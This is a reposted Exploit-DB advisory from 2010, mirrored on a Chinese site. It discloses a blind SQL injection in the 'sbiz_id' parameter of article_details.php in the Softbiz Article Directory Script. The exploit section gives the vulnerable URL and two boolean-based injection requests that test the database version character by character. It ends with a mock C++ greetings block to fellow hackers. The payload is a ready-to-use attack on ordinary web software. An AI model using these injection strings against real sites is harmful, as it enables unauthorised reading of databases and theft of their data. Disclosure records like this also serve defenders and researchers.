Softbiz Article Directory Script – ‘sbiz_id’ Blind SQL Injection - 体验盒子

作者： h4ck3r

日期： 2010-09-05

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14910/

===========================================================
[~] Title: Article Directory (sbiz_id) Blind SQL Injection Vuln
[~] Script: Article Directory
[~] Price: $65
[~] Link: http://www.softbizscripts.com/article-management-script.php
===========================================================
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
===========================================================
[~] 3xploit:
/article_details.php?sbiz_id=[Blind-Injection]

[~] Example:
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=4// False ,,
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=5// True ,,
===========================================================
[~] Greetings:
bool Greetings = True;
if (Greetings = True)
{
cout<<"Dr.2"
<<"Q8 H4x0r"
<<"Dr.Faustus"
<<"AsbMay's Group"
<<"darkc0de team"
<<"my wife.."
<<"and all friends \n";
}
else
{
cout<<"No greeting ..\n";
}
===========================================================